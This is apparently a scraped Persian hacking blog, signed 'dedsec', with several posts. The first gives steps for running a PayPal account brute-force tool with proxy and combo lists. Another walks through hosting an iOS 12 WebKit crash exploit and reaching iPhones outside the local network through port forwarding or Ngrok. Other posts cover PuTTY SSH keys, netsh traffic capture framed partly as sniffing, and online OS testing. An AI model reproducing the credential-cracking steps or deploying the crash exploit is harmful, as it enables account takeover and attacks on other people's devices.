بعد از اجرای برنامه موارد زیر را به ترتیب برای کرک و هک پی پال انجام دهید.
نحوه کرک پی پال
1 – پروکسی لیست و کمبو لیست خودرا به برنامه بدهید

2 – تنظیمات را متناسب با سرعت اینترنتتان و نظر خودتون تنظیم کنید
در اخر هم کلید Start Brute را بزنید تا کرک اغاز شود.


امنیت

از انتشار ایمیل اصلی خود که برای موارد مهم استفاده می شود جلوگیری کنید.

از پسورد های سخت و طولانی با حروف بزرگ و کوچک برای جلوگیری از هک پی پال خود استفاده کنید.

محدودیت برای ورود با ای پی خاص در حساب کاربری خود قرار دهید.

ورود های غیر مجاز را با اطلاع رسانی های ایمیلی کنترل نمایید.


لینک دانلود


آموزش ساخت کلید SSH با PuTTY

همه ما میدانیم که با پروتکل SSH میتوان به یک سرور از راه دور وصل شد و سرور را مانند سیستم خود کنترل و مدیریت کرد. این پروتکل یکی از پرکاربرد ترین پروتکل های اتصال به سرور در دنیا می باشد. در این مقاله به آموزش ساخت کلید SSH خواهیم پرداخت.

رمزنگاری همیشه یک بحث جذاب در کامپیوتر بوده و هست که به غیر قابل شنود بودن اطلاعات میان دو یا چند سیستم در شبکه توجه دارد و رمزنگاری که امروز قرار است درباره آن توضیح داده شود برای پروتکل SSH قابل استفاده است.

با ساخت کلید SSH میتوانید یک رمزنگاری موفق بین کلاینت و سرور خود ایجاد کنید. در برخی سایت های هاستینگ و VPS هنگام سفارش سرور، یکی از فیلد های اجباری ساخت کلید SSH است که در این آموزش به شما یاد خواهیم داد که چگونه با نرم افزار PuTTY یک کلید SSH بسازید. یکی از این کلیدها (Public Key) روی سرور شما قرار می‌گیرد و دیگری (Private Key) روی رایانۀ شما که قرار است به سرور متصل شود قرار می‌گیرد. پس از آن زمانی که خواسته باشید به سرور متصل شوید، این دو کلید با هم مقایسه می‌شوند و اگر با همدیگر مطابقت داشته باشند، اتصال از طریق SSH به سرور برقرار می‌شود.

در ابتدا PuTTYgen را که در محل نصب نرم افزار PuTTY وجود دارد را باز کنید. سپس در بخش Actions کلید Generate را انتخاب کنید تا کلید ساخته شود. با حرکت موس در بخش Key (قسمت خالی)مقدار رندوم کلید را انتخاب کرده که این روش به آنتروپی معروف است و برای ساخت هرچیزی که شبیه به بقیه نباشد به کار برده می شود.

کلید SSH

پس از ساخت کلید در قسمت Key Passphrase توصیه می شود که یک رمز عبور را نیز برای تضمین امنیت وارد کنید.

کلید SSH

پس از اتمام کار کلید را ذخیره کرده و کلید خصوصی (Private) را هم در یک مکان ایمن نگه داری کنید.

نحوه استفاده از کلید ها در SSH

برای استفاده از کلیدها در ssh، ابتدا وارد برنامه PuTTYgen شوید و روی تب File کلیک کنید سپس کلید Open را انتخاب و گزینه Load Private Key را انتخاب کنید و بعد از انتخاب فایل کلید رمز عبوری که برای آن درنظر گرفته اید را وارد کنید.

امیدوارم از این آموزش لذت و استفاده کافی رو برده باشید.

dedsec will give you the truth

join us


سلام خدمت تمامی کاربران گل سایت تیم امنیتی اولترا

 

امروزه گوشی های هوشمند بخش جدا ناپذیری از زندگی ما شده اند، به طوری که ما در روز بیشر وقتمون رو داریم با گوشی های هوشمندمون میگذرونیم ، در ایران بیشتر کاربرانی که از گوشی های هوشمند استفاده میکنن سیستم عامل اندروید رو روی گوشی خودشون دارن و همیشه یه جنگی بین کسانی که از اندروید استفاده میکنن و کسانی که از سیستم عامل ای او اس استفاده میکنن بوده که باعث شده ذهنیت اشتباهی نسبت به اینکه گوشی شرکت اپل که به نام آیفون معروفه قابل هک شدن نیست و خیلی امنه!!!! بین کاربران به وجود بیاد ، در اینجا باز من این نکته رو تکرار میکنم که هر جفت این سیستم عامل ها قابل نفوذ هستن و با خرید گوشی آیفون قرار نیست که شما دیگه هک نشید (اینطور آدم ها رو دیدم که میگم حتما شما هم زیاد دیدید:)

 

 

 

 

توی این مطلب میخواهیم با یک آسیب پذیری که در سیستم عامل ای او اس وجود داره کار کنیم ، این

آسیب پذیری در موتور رندر Webkit وجود داره که باعث میشه اگر با گوشی آیفون یک صفحه وب رو باز کنید گوشیتون کرش کنه و ریستارت بشه!!!!

 

 

خب میریم سراغ کارمون در قدم اول با دستور زیر اکسپلویت مورد نظر رو دانلود میکنیم ، این اکسپلویت با HTML نوشته شده و با کمی دانش HTML میتونید کد ها رو درک کنید

 

 

 

 

بعد از دانلود وارد پوشه اکسپلویت میشم که محتویات پوشه رو ببینم

 

 

در این مرحله من یه وب سرور احتیاج دارم که در ویندوز میتونید از Xampp استفاده کنید و در کالی لینوکس هم از Apache که به صورت پیشفرض روی کالی لینوکس نصبه ، محتویات پوشه اکسپلویت رو به مسیر زیر انتقال میدیم

 

 

 

بعد از انتقال فایل های اکسپلویت با دستور زیر وب سرور کالی لینوکس رو استارت میکنیم

 

 

 

قبل از اینکه روی گوشی تست کنیم یه موضوعی رو من توضیح بدم ، در پوشه اکسپلویت دو تا فایل HTML وجود داره که یکیش به اسم index.html  هست و فایل دیگه به اسم Original_Version.html هست که شما از هر دو این فایل های HTML میتونید استفاده بکنید فقط تنها فرقی که داره در فایل index.html عکس بکگراند به صورت لینک هست و شما میتونید به راحتی تغییرش بدید ولی در فایل Original_Version.html بکگراند به صورت انکود شده با انکودر base64 هست.

 

خب تا اینجا کار اکسپلویت ما آماده استفاده است من این اکسپلویت رو روی گوشی آیفون با نسخه ای او اس ۱۲ تست میکنم

 

 

 

من مرورگر رو برروی گوشی باز میکنم و ای پی وب سرور رو میدم ، ای پی وب سرور میشه ای پی سیستم عامل کالی لینوکس ما ، که اینجا چون من در شبکه داخلی خودم هستم ای پی پرایویت رو وارد میکنم ولی شما میتونید با پورت فورواردینگ یا استفاده از Ngrok این از این اکسپلویت خارج از شبکه خودتون هم استفاده کنید

 

 

 

بعد از وارد کردن ای پی وب سرور و اجرای فایل HTML گوشی ما کرش میکنه و ریستارت میشه

 

 

 

امیدوارم که از این مطلب لذت کافی رو برده باشید و اگر سوالی راجب این مطلب داشتید از طریق دیدگاه با ما در میان بزارید

 

 dedsec will give you the truth

join us


ضبط کردن ترافیک شبکه به کمک ابزار Netsh در CMD

هنگامی که قادر به نصب برنامه Wireshark یا Microsoft Network Monitor یا سایر نرم افزار های مانیتورینگ شبکه در یک سرور نیستید، می توانید با اجرای برنامه netsh.exe که به صورت پیش فرض داخل ویندوز قرار دارد و از طریق command line قابل دسترس و اجرا می باشد، تمامی ترافیک های داخل شبکه خود را در حالت های مختلف ضبط کنید. از این عمل برای شنود (Sniff) عملکرد شبکه نیز می توان استفاده کرد. پس در این مقاله با نحوه ضبط کردن ترافیک شبکه” آشنا خواهید شد.

netsh چیست؟


ضبط کردن ترافیک شبکه با ابزار CMD

netsh یا Network Shell یک ابزار اسکریپتی یا نوعی برنامه نویسی خط فرمان است که امکان نمایش اطلاعات مربوط به شبکه خود که در حال اجرا هستند را فراهم می کند و به شما اجازه می دهد پیکربندی های کامپیوتر خود را که داخل شبکه ارتباطی قرار دارد یعنی به شبکه متصل و در حین کار کردن باشد را تغییر دهید. با اجرای این ابزار یا دستور می توان از بخش های مختلف در پرونده های دسته ای یا اسکریپت ها نیز استفاده کرد و حتی کامپیوترهای از راه دور و محلی local را می توان با استفاده از دستورات netsh پیکربندی کرد.

مراحل انجام ضبط کردن ترافیک شبکه در ویندوز

برای این کار لازم است ابتدا با سطح دسترسی administrator وارد محیط cmd شوید. سپس با زدن کلیدهای ترکیبی windows+R از صفحه کلید یا keyboard وارد پنجره Run شده سپس دستور cmd را تایپ کرده و کلیدهای Ctrl+Shift+Enter را به صورت همزمان می فشاریم، زدن این کلید ها معادل اجرای برنامه با Run as administrator می باشد. در محیط command Prompt دستورات زیر را اجرا می کنیم.

با این دستور فایلی با پسوند etl در مسیر تعیین شده درایور C با نام dedsec.etl ایجاد شده که تا 250 مگابایت ظرفیت برای نگهداری اطلاعات ضبط شده یا کپچرشده از تمام ترافیک های شبکه به صورت کدگذاری شده به کار می رود.

چنانچه حجم این فایل کامل شود ضبط ترافیک شبکه متوقف می شود و اگر قصد توقف دستی را داشته باشیم میتوانیم با دستور زیر عملیات ضبط ترافیک شبکه را به اتمام برسانیم.

با اجرای دستور بالا یک فایل با پسوند Cab برای ما در همان مسیر ایجاد خواهد شد که این فایل را می توانیم با برنامه های مانیتوریگ مثل وایرشاک نیز اجرا کنیم در ضمن فایل ایجاد شده عملیات ضبط تمام ترافیک شبکه که با پسوند etl بود را می توان با برنامه Event Viewer در ویندوز باز کرد و اطلاعات مربوط به هر Log را دید.

برای دیدن وضعیت ترافیک شبکه از دستور زیر استفاده می کنیم:

برای دیدن تنظیمات بیشتری که قابلیت اعمال در ضبط ترافیک شبکه را دارند از دستور زیر استفاده می کنیم.

چناچه قصد ضبط تمام ترافیک های بین سرور محلی و آدرس مقصد را داشته باشیم مطابق دستور زیر عمل می کنیم:

اگرچه قصد ضبط کردن ترافیک یک پروتکل خاصی را داشته باشییم میتوانیم شماره پروتکل مربوطه را مطابق دستور زیر وارد کنیم.

در دستور بالا تمام ترافیک های پروتکل UDP که با شماره 17 مشخص شده است ضبط میشود. حجم پیش فرض برای توقف فایل ضبط ترافیک etl معادل 250مگابایت می باشد.

چنانچه کارت شبکه کامپیوتر یا سرور شما دارای چندین رابط یا اینترفیس مختلف اعم از Lan وWireless باشد و قصد ضبط کردن تمام ترافیک یک رابط خاصی را داشته باشید به صورت زیر عمل می کنیم.

dedsec will give you the truth

join us


اگر به فکر تغیر سیستم عامل خود هستید یا می خواهید چند سیستم عامل در یک سیستم داشته باشید اما مشکل انتخاب سیستم عامل دارید این اموزش به شما کمک خواهد کرد چرا که به یکی از اصلی ترین این سیستم عامل ها یعنی کالی لینوکس هم خواهیم پرداخت.

تست سیستم عامل از طریق وب سایت های انلاین

اگر بخواهید یک سیستم عامل را قبل از دانلود برسی کنید باید تصاویر محیط و اطلاعات ان را جستجو و مشاهده کنید اما برای برسی دقیق تر این اطلاعات کافی نخواهد بود به همین خاطر وب سایت هایی وجود دارند که به شما امکان تست را به صورت انلاین از طریق مرورگر می دهند که با این کار دیگر نیازی به دانلود و نصب فقط برای تست نخواهید داشت و می توانید بعد از تست انتخاب درستی برای دانلود و نصب داشته باشید.


تست انلاین انواع لینوکس

در ادامه یک وب سایت را معررفی می کنیم که می توانید در ان انواع سیستم عامل ها را تست کنید که یکی از ویژگی های ان این که حتی کالی لینوکس هم برای تست در ان قرار دارد که با یک کلیک می توانید وارد محیط ان شده و حتی برای یادگیری خود با بخش های مختلف ان کار کنید.

 

معرفی وب سایت DistroTest

همانطور که گفته شد از طریق این وب سایت می توانید انواع سیستم عامل ها را مانند یک سرور مجازی به صورت انلاین تست نمایید اما نکته ای که وجود دارد این است که این سرویس ها به شبکه اینترنت متصل نیستند و فقط به منظور تست ایجاد شده اند، در صورت نیاز می توانید از وب سایت اول سرور ، سرور مجازی با سیستم عامل دلخواه مانند کالی لینوکس تهیه کنید تا بدون محدودیت بتوانید از ان استفاده کنید.

لینک DistroTest :

https://distrotest.net/

وارد لینک بالا شده و از منو New Systems را انتخاب کنید تا تمامی OS های جدید را نمایش دهد.


مرحله اول از اجرای انلاین سیستم عامل

سپس کالی لینوکس یا سیستم عامل مورد نظر خود را پیدا کنید و بر روی گزینه details بزنید.

در این بخش گزینه Start را بزنید تا فعال شود.


مرحله دوم از نحوه استفاده از DistroTest

منتظر بمانید تا OS موردنظر شما در پنجره جدید در مرورگر شما باز شود.

با این روش به راحتی می توانید از انواع سیستم عامل ها استفاده نمایید.

برخی از سیستم عامل ها که در DistroTest قابل تست هستند :

  • Kali Linux
  • Arch Linux
  • Ubuntu
  • Deepin
  • لینوکس مانجارو
  • اندروید
  • ….

dedsec will give you the truth

join us


تبلیغات

محل تبلیغات شما

آخرین مطالب

محل تبلیغات شما محل تبلیغات شما

آخرین وبلاگ ها

آخرین جستجو ها

مهارت های زندگی برای جوانان اشتراک مطالب دخترونه شیوا رایانه طراحی سایت Tamara Alicia آموزش زبان انگلیسی گرجستان بررسی تخصصی پاوربانک جویروم